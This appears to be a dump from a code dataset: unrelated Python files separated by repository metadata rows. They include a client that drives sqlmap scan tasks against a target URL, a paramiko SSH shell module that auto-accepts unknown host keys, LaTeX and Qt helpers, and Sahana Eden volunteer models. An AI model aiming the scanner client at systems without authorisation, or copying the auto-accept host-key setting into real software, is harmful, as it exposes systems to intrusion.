Args:
path (str): url path for request.
method (str): GET or POST for different request.
Returns:
dict if successful, None otherwirse.
"""
try:
url, method = urljoin(self.addr, path), method.upper()
if method == 'GET':
r = requests.get(url).json()
elif method == 'POST':
r = requests.post(url, json=self.options).json()
except requests.RequestException as e:
logger.error('Fail to %s %s: %s' % (method, path, e))
return None
if r.get('success'):
return r
else:
logger.error('Fail to %s %s: %s' % (method, path, r.get('message'))) # noqa
return None
def set_option(self, key, value):
""" Set option for task.
Options can be set when client create task, or call `set_option`
after task is created but not start.
Args:
key (str): option name.
value (str): option value.
Returns:
Task: for chained call, eg.
`task.set_option(key, value).set_option(key, value)`.
"""
self.options[key] = value
if key == 'url':
self.url = value
return self
def get_option(self, key):
""" Get task option.
Args:
key (str): option name.
Returns:
str: option value.
"""
return self.options.get(key)
def update_options(self, options):
""" Update some options at same time.
Args:
options (dict): options that to update.
"""
self.options.update(options)
if 'url' in options:
self.url = options.get('url')
def list_options(self):
""" Get options that manually set.
Returns:
dict: options that user set.
"""
return self.options
def start(self, url=None, options=None):
""" Task start to run.
Args:
url (str): target url to scan by sqlmap, this is a shorthand
for set option with key `url`
options (Optional[dict]): shorthand, set options for task,
alternative to `set_option` or `update_options` or set
options when create task.
Returns:
str: engineid, maybe useful in future.
"""
if options:
self.update_options(options)
if url:
self.url = url
self.set_option('url', url)
r = self._request('/scan/%s/start' % self.id, 'POST')
self.engineid = r.get("engineid") if r else None
return self.engineid
def stop(self):
""" Stop running task.
Returns:
bool: True if stop successfully, False otherwise.
"""
r = self._request('/scan/%s/stop' % self.id)
return bool(r)
def kill(self):
""" Kill running task unconditionally.
Returns:
bool: True if Kill successfully, False otherwise.
"""
r = self._request('/scan/%s/kill' % self.id)
return bool(r)
def status(self):
""" Task currenty status, ready, running or finished.
Returns:
dict: include status and retcode.
Raises:
TaskStatusError: status exception.
"""
r = self._request('/scan/%s/status' % self.id)
if r:
status, retcode = r.get('status'), r.get('returncode')
return {'status': status, 'retcode': retcode}
else:
raise TaskStatusError("Can't get status")
@property
def ready(self):
""" shorthand for task status.
Returns:
bool: True if task is created but not start, False otherwise.
"""
try:
r = self.status()
return r.get('status') == TaskStatus.READY
except TaskStatusError as e:
logger.error('Fail to GET task<%s> status: %s', self.id, e)
return False
@property
def running(self):
""" shorthand for task status.
Returns:
bool: True if task start but not finished, False otherwise.
"""
try:
r = self.status()
return r.get('status') == TaskStatus.RUNNING
except TaskStatusError as e:
logger.error('Fail to GET task<%s> status: %s', self.id, e)
return False
@property
def finished(self):
""" shorthand for task status.
Returns:
bool: True if task is finished, False otherwise.
"""
try:
r = self.status()
return r.get('status') == TaskStatus.FINISHED
except TaskStatusError as e:
logger.error('Fail to GET task<%s> status: %s', self.id, e)
return False
def get_result(self):
""" Get task result.
Returns:
dict: task data.
Raises:
TaskResultError: task result exception.
"""
r = self._request('/scan/%s/data' % self.id)
if r:
return r.get('data')
else:
raise TaskResultError("Can't get result")
def get_log(self, start=None, end=None):
""" Get task log.
Args:
start (int): start index of log list.
end (int): end index of log list.
Returns:
dict: task log data.
Raises:
TaskLogError: task log exception.
"""
if start and end:
r = self._request('/scan/%s/log/%s/%s' % (self.id, start, end))
else:
r = self._request('/scan/%s/log' % self.id)
if r:
return r.get('log')
else:
raise TaskLogError("Can't get log")
def run(self, url=None, options=None, interval=5):
""" Shorthand for call `start`, `status` and `get_result`
Args:
url (str): target url to scan by sqlmap, this is a shorthand
for set option with key `url`
options (Optional[dict]): shorthand, set options for task,
alternative to `set_option` or `update_options` or set
options when create task.
interval (int): interval time toquery task status, seconds default.
Returns:
dict if successfully, None otherwise.
"""
self.start(url, options)
while self.running:
time.sleep(interval)
try:
r = self.get_result()
except TaskResultError as e:
logger.error('Fail to GET task<%s> result: %s', self.id, e)
return None
return r
| mit | 1,762,396,039,140,903,200 | 26.659864 | 88 | 0.522258 | false | 4.222222 | false | false | false |
jaqx0r/fengshui | rack2tex.py | 1 | 3011 | #!/usr/bin/python
import rack
import string
class RackView:
def __init__(self, name):
self.options = []
self.name = name
# output variable
self.o = []
self.notes = []
self.images = []
self.checklist = []
def render(self, thing):
"""
@param thing: the rack or rackarray to be drawn
"""
self.o.append("\\section{%s}" % (thing._name,))
self.o.append("\\begin{multicols}{2}")
self.o.append("\\includegraphics[height=\\textheight]{%s}" % (string.split(self.name, '.')[0],))
self.o.append("\\columnbreak")
# requirements
#self.o.append("\\\\Requirements")
#self.o.append("\\begin{itemize}")
#for (k, v) in [("network port", thing.network),
# ("power outlet", thing.power),
# ]:
# self.o.append("\item %s %s%s" % (v, k, ["s", ""][v == 1]))
#self.o.append("\\end{itemize}")
# recurse
for y in range(thing.units-1, -1, -1):
if thing._elements.has_key(y):
e = thing._elements[y]
if e is not None:
e.visit(self)
# notes
#self.o.append("\\subsubsection{Notes}")
#self.o.append("{\\small")
#if len(self.notes) > 0:
# self.o.append("\\begin{description}")
# self.o += self.notes
# self.o.append("\\end{description}")
#self.o.append("}%end small")
# checklist
if len(self.checklist) > 0:
self.o.append("\\begin{center}")
self.o.append("{\\footnotesize")
self.o.append("\\begin{tabular}{r|c|c|c|c|c}")
self.o.append("&racked&net&pow&on&servs\\\\")
self.o.append("\\hline")
self.o += self.checklist
self.o.append("\\end{tabular}")
self.o.append("}%end footnotesize")
self.o.append("\\end{center}")
# images
self.o.append("\\begin{center}")
self.o += self.images
self.o.append("\\end{center}")
self.o.append("\\end{multicols}")
# spit out
return string.join(self.o, "\n")
def visitRackElement(self, e):
if e.image != "":
self.images.append("\\includegraphics[width=4cm]{%s}\\\\" % (e.image,))
if e.notes != "":
self.notes.append("\\item[%s] %s" % (e.name, e.notes))
self.checklist.append("%s&&&&&\\\\\n\\hline" % (e.name,))
def visitCableManagement(self, cman):
pass
def visitRackmount(self, rm):
return self.visitRackElement(rm)
def visitSwitch(self, sw):
return self.visitRackElement(sw)
def visitAPC(self, apc):
return self.visitRackElement(apc)
def visitGap(self, gap):
pass
def visitShelf(self, shelf):
l = len(self.images)
for e in shelf._elements:
e.visit(self)
if len(self.images) > l:
self.images.append("\\\\")
def visitShelf1RU(self, shelf):
return self.visitShelf(shelf)
def visitShelf2U(self, shelf):
return self.visitShelf(shelf)
def visitShelf1a(self, shelf):
return self.visitShelf(shelf)
def visitBox(self, box):
if box.image != "":
self.images.append("\\includegraphics[width=%smm]{%s}" % (box.width/11,box.image))
if box.notes != "":
self.notes.append("\\item[%s] %s" % (box._name, box.notes))
self.checklist.append("%s&&&&&\\\\\n\\hline" % (box._name,))
| gpl-2.0 | 1,538,439,439,429,373,400 | 24.091667 | 98 | 0.608768 | false | 2.674067 | false | false | false |
vipersnh/regbank_reader | client/widgets/status_bar.py | 1 | 1872 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file './client/widgets/status_bar.ui'
#
# Created: Thu Sep 17 23:50:20 2015
# by: PyQt4 UI code generator 4.9.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_statusWidget(object):
def setupUi(self, statusWidget):
statusWidget.setObjectName(_fromUtf8("statusWidget"))
statusWidget.resize(625, 39)
self.horizontalLayout = QtGui.QHBoxLayout(statusWidget)
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.label_status = QtGui.QLabel(statusWidget)
self.label_status.setMinimumSize(QtCore.QSize(441, 16))
self.label_status.setText(_fromUtf8(""))
self.label_status.setObjectName(_fromUtf8("label_status"))
self.horizontalLayout.addWidget(self.label_status)
self.line = QtGui.QFrame(statusWidget)
self.line.setFrameShape(QtGui.QFrame.VLine)
self.line.setFrameShadow(QtGui.QFrame.Sunken)
self.line.setObjectName(_fromUtf8("line"))
self.horizontalLayout.addWidget(self.line)
self.label_record = QtGui.QLabel(statusWidget)
self.label_record.setMinimumSize(QtCore.QSize(151, 21))
self.label_record.setMaximumSize(QtCore.QSize(151, 16777215))
self.label_record.setText(_fromUtf8(""))
self.label_record.setObjectName(_fromUtf8("label_record"))
self.horizontalLayout.addWidget(self.label_record)
self.retranslateUi(statusWidget)
QtCore.QMetaObject.connectSlotsByName(statusWidget)
def retranslateUi(self, statusWidget):
statusWidget.setWindowTitle(QtGui.QApplication.translate("statusWidget", "Form", None, QtGui.QApplication.UnicodeUTF8))
| gpl-2.0 | -3,422,909,493,384,256,500 | 40.6 | 127 | 0.711004 | false | 3.875776 | false | false | false |
jonhadfield/ansible | lib/ansible/module_utils/issh.py | 5 | 5367 | #
# (c) 2015 Peter Sprygada, <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
"""
Ansible shared module for building modules that require an interactive
SSH Shell such as those for command line driven devices. This module
provides a native SSH transport using paramiko and builds a base Shell
class for creating shell driven modules.
In order to use this module, include it as part of a custom
module as shown below and create and subclass Shell.
** Note: The order of the import statements does matter. **
from ansible.module_utils.basic import *
from ansible.module_utils.ssh import *
This module provides the following common argument spec for creating
shell connections:
* host (str) - [Required] The IPv4 address or FQDN of the device
* port (int) - Overrides the default SSH port.
* username (str) - [Required] The username to use to authenticate
the SSH session.
* password (str) - [Required] The password to use to authenticate
the SSH session
* connect_timeout (int) - Specifies the connection timeout in seconds
"""
import re
import socket
from StringIO import StringIO
import paramiko
def shell_argument_spec(spec=None):
""" Generates an argument spec for the Shell class
"""
arg_spec = dict(
host=dict(required=True),
port=dict(default=22, type='int'),
username=dict(required=True),
password=dict(required=True),
connect_timeout=dict(default=10, type='int'),
)
if spec:
arg_spec.update(spec)
return arg_spec
class ShellError(Exception):
def __init__(self, msg, command=None):
super(ShellError, self).__init__(msg)
self.message = msg
self.command = command
class Command(object):
def __init__(self, command, prompt=None, response=None):
self.command = command
self.prompt = prompt
self.response = response
def __str__(self):
return self.command
class Ssh(object):
def __init__(self):
self.client = None
def open(self, host, port=22, username=None, password=None,
timeout=10, key_filename=None):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
use_keys = password is None
ssh.connect(host, port=port, username=username, password=password,
timeout=timeout, allow_agent=use_keys, look_for_keys=use_keys,
key_filename=key_filename)
self.client = ssh
return self.on_open()
def on_open(self):
pass
def close(self):
self.client.close()
return self.on_close()
def on_close(self):
pass
class Shell(Ssh):
def __init__(self):
super(Shell, self).__init__()
self.shell = None
self.prompts = list()
self.errors = list()
def on_open(self):
self.shell = self.client.invoke_shell()
self.shell.settimeout(10)
self.receive()
def receive(self, cmd=None):
recv = StringIO()
while True:
recv.write(self.shell.recv(200))
recv.seek(recv.tell() - 200)
window = recv.read()
if isinstance(cmd, Command):
self.handle_input(window, prompt=cmd.prompt,
response=cmd.response)
try:
if self.read(window):
resp = recv.getvalue()
return self.sanitize(cmd, resp)
except ShellError, exc:
exc.command = cmd
raise
def send(self, command):
try:
cmd = '%s\r' % str(command)
self.shell.sendall(cmd)
return self.receive(command)
except socket.timeout, exc:
raise ShellError("timeout trying to send command", cmd)
def handle_input(self, resp, prompt, response):
if not prompt or not response:
return
prompt = to_list(prompt)
response = to_list(response)
for pr, ans in zip(prompt, response):
match = pr.search(resp)
if match:
cmd = '%s\r' % ans
self.shell.sendall(cmd)
def sanitize(self, cmd, resp):
cleaned = []
for line in resp.splitlines():
if line.startswith(str(cmd)) or self.read(line):
continue
cleaned.append(line)
return "\n".join(cleaned)
def read(self, response):
for regex in self.errors:
if regex.search(response):
raise ShellError('{}'.format(response))
for regex in self.prompts:
if regex.search(response):
return True
| gpl-3.0 | 3,679,719,289,842,315,300 | 26.664948 | 82 | 0.611515 | false | 4.154025 | false | false | false |
kgullikson88/IGRINS_Scripts | CheckSystematics.py | 1 | 2096 | from __future__ import print_function
from collections import defaultdict
from astropy.io import fits
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
def telluric_systematics(file_list, header_kw='HUMIDITY', plot=True, ref_num=10):
"""
Find the average change in the requested header keyword over all IGRINS telluric fits
:param file_list: A list of IGRINS Corrected_* files
:param header_kw: the keyword to search for in each fits extension header
:param plot: If true, plot all of the values
:param ref_num: Which extension to use as the reference
:return: The median value of the keyword for each fits extension
"""
data = defaultdict(list)
for fname in file_list:
print(fname)
hdulist = fits.open(fname)
for i, hdu in enumerate(hdulist[1:]):
data['fname'].append(fname)
data['Ext_num'].append(i + 1)
data['Middle_Wavelength'].append(np.median(hdu.data.field('wavelength')))
data['value'].append(hdu.header[header_kw])
# Convert the dict to a dataframe for easier access
df = pd.DataFrame(data=data)
# Scale by the median value of the keyword within the given filename
# (to account for weather variations rather than data systematics)
median_values = defaultdict(float)
for fname in file_list:
median_values[fname] = float(df.loc[(df.fname == fname) & (df.Ext_num == ref_num)]['value'])
print(median_values)
make_scaled = lambda row: row['value'] / median_values[row['fname']]
df['scaled_value'] = df.apply(make_scaled, axis=1)
# Determine the median value for each fits extension
median = df.groupby('Ext_num').median()[['Middle_Wavelength', 'scaled_value']]
# Plot, if desired
if plot:
plt.scatter(df.Middle_Wavelength, df.scaled_value, color='red', alpha=0.1)
plt.plot(median.Middle_Wavelength, median.scaled_value, color='green', lw=2)
plt.xlabel('Wavelength (nm)')
plt.ylabel('{} scale factor'.format(header_kw))
plt.show()
return median
| mit | -4,900,011,001,830,106,000 | 37.814815 | 100 | 0.668893 | false | 3.729537 | false | false | false |
jmp1985/metrix-database | database.py | 1 | 1371 | from __future__ import division
class MetrixDB(object):
'''
A high level class to perform operations on the metrix database
'''
def __init__(self, overwrite=False):
'''
Initialise the database
'''
from metrix_db.initialiser import Initialiser
initialiser = Initialiser(overwrite=overwrite)
self.handle = initialiser.handle
def add_pdb_entry(self, pdb_id, filename):
'''
Add a pdb entry to the database
'''
from metrix_db.pdb_parser import PDBParser
parser = PDBParser(self.handle)
parser.add_entry(pdb_id, filename)
def add_xia2_entry(self,
pdb_id,
xia2_txt_filename,
xia2_json_filename):
'''
Add a xia2 entry to the database
'''
from metrix_db.xia2_parser import XIA2Parser
parser = XIA2Parser(self.handle)
parser.add_entry(pdb_id, xia2_txt_filename, xia2_json_filename)
def add_protein_entry(self, pdb_id, filename):
'''
Add a protein entry to the database
'''
from metrix_db.protein_parser import ProteinParser
parser = ProteinParser(self.handle)
parser.add_protein(pdb_id, filename)
def write_csv(self, filename):
'''
Write a CSV file from the database
'''
from metrix_db.csv_writer import CSVWriter
writer = CSVWriter(self.handle)
writer.write(filename)
| bsd-2-clause | 1,228,949,856,530,809,000 | 23.482143 | 67 | 0.645514 | false | 3.646277 | false | false | false |
markvl/acrylamid | acrylamid/views/tag.py | 2 | 3986 | # -*- encoding: utf-8 -*-
#
# Copyright 2012 Martin Zimmermann <[email protected]>. All rights reserved.
# License: BSD Style, 2 clauses -- see LICENSE.
import math
import random
from collections import defaultdict
from acrylamid.compat import iteritems
from acrylamid.helpers import expand, safeslug, hash
from acrylamid.views.index import Index, Paginator
def fetch(entrylist):
"""Fetch tags from list of entries and map tags to most common tag name
"""
tags = defaultdict(list)
tmap = defaultdict(int)
for e in entrylist:
for tag in e.tags:
tags[tag.lower()].append(e)
tmap[tag] += 1
# map tags to the most counted tag name
for name in list(tags.keys()):
key = max([(tmap[key], key) for key in tmap
if key.lower() == name])[1]
rv = tags.pop(key.lower())
tags[key] = rv
return tags
class Tagcloud(object):
"""Tagcloud helper class similar (almost identical) to pelican's tagcloud helper object.
Takes a bunch of tags and produces a logarithm-based partition and returns a iterable
object yielding a Tag-object with two attributes: name and step where step is the
calculated step size (== font size) and reaches from 0 to steps-1.
:param tags: a dictionary of tags, e.g. {'name', [list of entries]}
:param steps: maximum steps
:param max_items: maximum items shown in tagcloud
:param start: start index of steps resulting in start to steps+start-1 steps."""
def __init__(self, tags, steps=4, max_items=100, start=0, shuffle=False):
lst = sorted([(k, len(v)) for k, v in iteritems(tags)],
key=lambda x: x[0])[:max_items]
# stolen from pelican/generators.py:286
max_count = max(lst, key=lambda k: k[1])[1] if lst else None
self.lst = [(tag, count,
int(math.floor(steps - (steps - 1) * math.log(count)
/ (math.log(max_count) or 1)))+start-1)
for tag, count in lst]
if shuffle:
random.shuffle(self.lst)
self.tags = tags
def __iter__(self):
for tag, count, step in self.lst:
yield type('Tag', (), {'name': tag, 'step': step, 'count': count})
def __hash__(self):
return hash(*self.lst)
def __getitem__(self, tag):
return self.tags[tag.name]
class Tag(Index):
"""Same behaviour like Index except ``route`` that defaults to */tag/:name/* and
``pagination`` that defaults to */tag/:name/:num/* where :name is the current
tag identifier.
To create a tag cloud head over to :doc:`conf.py`.
"""
export = ['prev', 'curr', 'next', 'items_per_page', 'tag', 'entrylist']
template = 'main.html'
def populate_tags(self, request):
tags = fetch(request['entrylist'])
self.tags = tags
return tags
def context(self, conf, env, request):
class Link:
def __init__(self, title, href):
self.title = title
self.href = href
def tagify(tags):
href = lambda t: expand(self.path, {'name': safeslug(t)})
return [Link(t, href(t)) for t in tags] if isinstance(tags, (list, tuple)) \
else Link(tags, href(tags))
tags = self.populate_tags(request)
env.engine.register('tagify', tagify)
env.tag_cloud = Tagcloud(tags, conf['tag_cloud_steps'],
conf['tag_cloud_max_items'],
conf['tag_cloud_start_index'],
conf['tag_cloud_shuffle'])
return env
def generate(self, conf, env, data):
"""Creates paged listing by tag."""
for tag in self.tags:
data['entrylist'] = [entry for entry in self.tags[tag]]
for res in Paginator.generate(self, conf, env, data, tag=tag, name=safeslug(tag)):
yield res
| bsd-2-clause | 2,275,150,804,303,033,000 | 31.942149 | 94 | 0.580281 | false | 3.84378 | false | false | false |
tudorian/eden | modules/s3db/vol.py | 2 | 28816 | # -*- coding: utf-8 -*-
"""
Sahana Eden Volunteers Management
(Extends modules/eden/hrm.py)
@copyright: 2012-15 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ["S3VolunteerModel",
"S3VolunteerAwardModel",
"S3VolunteerClusterModel",
"vol_service_record",
]
try:
# Python 2.7
from collections import OrderedDict
except:
# Python 2.6
from gluon.contrib.simplejson.ordered_dict import OrderedDict
from gluon import *
from gluon.storage import Storage
from ..s3 import *
from s3layouts import S3AddResourceLink
# =============================================================================
class S3VolunteerModel(S3Model):
names = ("vol_details",)
def model(self):
T = current.T
UNKNOWN_OPT = current.messages.UNKNOWN_OPT
availability_opts = {1: T("No Restrictions"),
2: T("Weekends only"),
3: T("School Holidays only"),
}
# ---------------------------------------------------------------------
# Volunteer Details
# - extra details for volunteers
#
tablename = "vol_details"
self.define_table(tablename,
self.hrm_human_resource_id(ondelete = "CASCADE"),
Field("active", "boolean",
default = False,
label = T("Active"),
represent = self.vol_active_represent,
),
Field("availability", "integer",
label = T("Availability"),
represent = lambda opt: \
availability_opts.get(opt,
UNKNOWN_OPT),
requires = IS_EMPTY_OR(
IS_IN_SET(availability_opts)
),
),
Field("card", "boolean",
default = False,
label = T("Card holder"),
represent = self.vol_active_represent,
# Enable in-template when-required
readable = False,
writable = False,
),
*s3_meta_fields())
# =========================================================================
@staticmethod
def vol_active_represent(opt):
""" Represent the Active status of a Volunteer """
if "report" in current.request.args:
# We can't use a represent
return opt
# List view, so HTML represent is fine
if opt:
output = DIV(current.T("Yes"), _style="color:green")
else:
output = DIV(current.T("No"), _style="color:red")
return output
# =============================================================================
class S3VolunteerAwardModel(S3Model):
names = ("vol_award",
"vol_volunteer_award",
)
def model(self):
T = current.T
db = current.db
auth = current.auth
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
ADMIN = current.session.s3.system_roles.ADMIN
is_admin = auth.s3_has_role(ADMIN)
root_org = auth.root_org()
if is_admin:
filter_opts = ()
elif root_org:
filter_opts = (root_org, None)
else:
filter_opts = (None,)
# ---------------------------------------------------------------------
# Volunteer Award
#
tablename = "vol_award"
define_table(tablename,
Field("name",
label = T("Name")),
# Only included in order to be able to set
# realm_entity to filter appropriately
self.org_organisation_id(default = root_org,
readable = is_admin,
writable = is_admin,
),
s3_comments(label=T("Description"),
comment=None),
*s3_meta_fields())
crud_strings[tablename] = Storage(
label_create = T("Create Award"),
title_display = T("Award"),
title_list = T("Award"),
title_update = T("Edit Award"),
title_upload = T("Import Awards"),
label_list_button = T("List Awards"),
label_delete_button = T("Delete Award"),
msg_record_created = T("Award added"),
msg_record_modified = T("Award updated"),
msg_record_deleted = T("Award deleted"),
msg_list_empty = T("No Awards found"))
comment = S3AddResourceLink(c = "vol",
f = "award",
label = crud_strings[tablename].label_create,
title = T("Award"),
)
represent = S3Represent(lookup=tablename)
award_id = S3ReusableField("award_id", "reference %s" % tablename,
label = T("Award"),
requires = IS_EMPTY_OR(
IS_ONE_OF(db,
"vol_award.id",
represent,
filterby="organisation_id",
filter_opts=filter_opts)),
represent = represent,
comment = comment
)
# ---------------------------------------------------------------------
# Volunteers <> Awards link table
#
tablename = "vol_volunteer_award"
define_table(tablename,
self.pr_person_id(empty=False),
award_id(),
s3_date(),
s3_comments(),
*s3_meta_fields())
crud_strings[tablename] = Storage(
label_create = T("Create Award"),
title_display = T("Award"),
title_list = T("Award"),
title_update = T("Edit Award"),
title_upload = T("Import Awards"),
label_list_button = T("List Awards"),
label_delete_button = T("Delete Award"),
msg_record_created = T("Award added"),
msg_record_modified = T("Award updated"),
msg_record_deleted = T("Award deleted"),
msg_list_empty = T("No Awards found"))
self.configure(tablename,
context = {"person": "person_id"},
)
# Pass names back to global scope (s3.*)
return dict()
# =============================================================================
class S3VolunteerClusterModel(S3Model):
names = ("vol_cluster_type",
"vol_cluster",
"vol_cluster_position",
"vol_volunteer_cluster",
)
def model(self):
T = current.T
db = current.db
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
# ---------------------------------------------------------------------
# Volunteer Cluster
tablename = "vol_cluster_type"
define_table(tablename,
Field("name", length=255, unique=True,
label = T("Name")),
*s3_meta_fields())
crud_strings[tablename] = Storage(
label_create = T("Create Volunteer Cluster Type"),
title_display = T("Volunteer Cluster Type"),
title_list = T("Volunteer Cluster Type"),
title_update = T("Edit Volunteer Cluster Type"),
title_upload = T("Import Volunteer Cluster Types"),
label_list_button = T("List Volunteer Cluster Types"),
label_delete_button = T("Delete Volunteer Cluster Type"),
msg_record_created = T("Volunteer Cluster Type added"),
msg_record_modified = T("Volunteer Cluster Type updated"),
msg_record_deleted = T("Volunteer Cluster Type deleted"),
msg_list_empty = T("No Volunteer Cluster Types"))
comment = S3AddResourceLink(c = "vol",
f = "cluster_type",
vars = dict(child = "vol_cluster_type_id",
parent = "volunteer_cluster"),
label = crud_strings[tablename].label_create,
title = T("Volunteer Cluster Type"),
)
represent = S3Represent(lookup=tablename)
vol_cluster_type_id = S3ReusableField("vol_cluster_type_id", "reference %s" % tablename,
label = T("Volunteer Cluster Type"),
requires = IS_EMPTY_OR(
IS_ONE_OF(db,
"vol_cluster_type.id",
represent)),
represent = represent,
comment = comment
)
# ---------------------------------------------------------------------
# Volunteer Cluster
tablename = "vol_cluster"
define_table(tablename,
vol_cluster_type_id(),
Field("name", length=255, unique=True,
label = T("Name")),
*s3_meta_fields())
crud_strings[tablename] = Storage(
label_create = T("Create Volunteer Cluster"),
title_display = T("Volunteer Cluster"),
title_list = T("Volunteer Cluster"),
title_update = T("Edit Volunteer Cluster"),
title_upload = T("Import Volunteer Clusters"),
label_list_button = T("List Volunteer Clusters"),
label_delete_button = T("Delete Volunteer Cluster"),
msg_record_created = T("Volunteer Cluster added"),
msg_record_modified = T("Volunteer Cluster updated"),
msg_record_deleted = T("Volunteer Cluster deleted"),
msg_list_empty = T("No Volunteer Clusters"))
comment = S3AddResourceLink(c = "vol",
f = "cluster",
vars = dict(child = "vol_cluster_id",
parent = "volunteer_cluster"),
label = crud_strings[tablename].label_create,
title = T("Volunteer Cluster"),
)
represent = S3Represent(lookup=tablename)
vol_cluster_id = S3ReusableField("vol_cluster_id", "reference %s" % tablename,
label = T("Volunteer Cluster"),
requires = IS_EMPTY_OR(
IS_ONE_OF(db,
"vol_cluster.id",
represent)),
represent = represent,
comment = comment
)
# ---------------------------------------------------------------------
# Volunteer Group Position
#
tablename = "vol_cluster_position"
define_table(tablename,
Field("name", length=255, unique=True,
label = T("Name")),
*s3_meta_fields())
crud_strings[tablename] = Storage(
label_create = T("Create Volunteer Cluster Position"),
title_display = T("Volunteer Cluster Position"),
title_list = T("Volunteer Cluster Position"),
title_update = T("Edit Volunteer Cluster Position"),
title_upload = T("Import Volunteer Cluster Positions"),
label_list_button = T("List Volunteer Cluster Positions"),
label_delete_button = T("Delete Volunteer Cluster Position"),
msg_record_created = T("Volunteer Cluster Position added"),
msg_record_modified = T("Volunteer Cluster Position updated"),
msg_record_deleted = T("Volunteer Cluster Position deleted"),
msg_list_empty = T("No Volunteer Cluster Positions"))
comment = S3AddResourceLink(c = "vol",
f = "cluster_position",
vars = dict(child = "vol_cluster_position_id",
parent = "volunteer_cluster"),
label = crud_strings[tablename].label_create,
title = T("Volunteer Cluster Position"),
)
represent = S3Represent(lookup=tablename)
vol_cluster_position_id = S3ReusableField("vol_cluster_position_id", "reference %s" % tablename,
label = T("Volunteer Cluster Position"),
requires = IS_EMPTY_OR(
IS_ONE_OF(db,
"vol_cluster_position.id",
represent)),
represent = represent,
comment = comment
)
# ---------------------------------------------------------------------
# Volunteer Cluster Link Table
cluster_type_filter = '''
$.filterOptionsS3({
'trigger':'vol_cluster_type_id',
'target':'vol_cluster_id',
'lookupKey':'vol_cluster_type_id',
'lookupPrefix':'vol',
'lookupResource':'cluster',
})'''
tablename = "vol_volunteer_cluster"
define_table(tablename,
self.hrm_human_resource_id(ondelete = "CASCADE"),
vol_cluster_type_id(script = cluster_type_filter), # This field is ONLY here to provide a filter
vol_cluster_id(readable=False,
writable=False),
vol_cluster_position_id(readable=False,
writable=False),
*s3_meta_fields())
# Pass names back to global scope (s3.*)
return dict(vol_cluster_type_id = vol_cluster_type_id,
vol_cluster_id = vol_cluster_id,
)
# =====================================================================
@staticmethod
def defaults():
"""
Return safe defaults for model globals, this will be called instead
of model() in case the model has been deactivated in
deployment_settings.
"""
return dict(
vol_cluster_id = S3ReusableField("vol_cluster_id", "integer",
readable=False,
writable=False),
)
# =============================================================================
def vol_service_record(r, **attr):
"""
Generate a Volunteer Service Record
"""
record = r.record
if record.type != 2:
# Only relevant to volunteers
return None
T = current.T
db = current.db
ptable = db.pr_person
person_id = record.person_id
person = db(ptable.id == person_id).select(ptable.pe_id,
ptable.first_name,
ptable.middle_name,
ptable.last_name,
ptable.comments,
limitby=(0, 1),
).first()
vol_name = s3_fullname(person)
def callback(r):
# Header
s3db = current.s3db
otable = db.org_organisation
org_id = record.organisation_id
org = db(otable.id == org_id).select(otable.name,
otable.acronym,
otable.logo,
limitby=(0, 1),
).first()
org_name = org.name
logo = org.logo
if logo:
logo = s3db.org_organisation_logo(org)
elif current.deployment_settings.get_org_branches():
root_org = current.cache.ram(
# Common key with auth.root_org
"root_org_%s" % org_id,
lambda: s3db.org_root_organisation(org_id),
time_expire=120
)
logo = s3db.org_organisation_logo(root_org)
innerTable = TABLE(TR(TH(vol_name)),
TR(TD(org_name)))
person_details = TABLE(TR(TD(logo),
TD(innerTable)
))
pe_id = person.pe_id
# Photo
itable = s3db.pr_image
query = (itable.pe_id == pe_id) & \
(itable.profile == True)
image = db(query).select(itable.image,
limitby=(0, 1)).first()
if image:
image = image.image
size = (160, None)
image = s3db.pr_image_represent(image, size=size)
size = s3db.pr_image_size(image, size)
url = URL(c="default",
f="download",
args=image)
avatar = IMG(_src=url,
_width=size[0],
_height=size[1],
)
person_details[0].append(TD(avatar))
# Contact Details
contact_details = DIV()
# Addresses
addrtable = s3db.pr_address
ltable = db.gis_location
query = (addrtable.pe_id == pe_id) & \
(addrtable.location_id == ltable.id)
addresses = db(query).select(addrtable.type,
ltable.addr_street,
ltable.L3,
ltable.L2,
ltable.L1,
orderby = addrtable.type,
limitby=(0, 2))
address_list = []
for address in addresses:
_location = address["gis_location"]
address = TABLE(TR(TH(addrtable.type.represent(address["pr_address"].type))),
TR(_location.addr_street),
TR(_location.L3),
TR(_location.L2),
TR(_location.L1),
)
address_list.append(address)
# Contacts
ctable = s3db.pr_contact
contacts = db(ctable.pe_id == pe_id).select(ctable.contact_method,
ctable.value,
orderby = ctable.priority,
limitby=(0, 3))
contact_list = TABLE()
contact_represent = ctable.contact_method.represent
for contact in contacts:
contact_list.append(TH(contact_represent(contact.contact_method)))
contact_list.append(contact.value)
# Emergency Contact
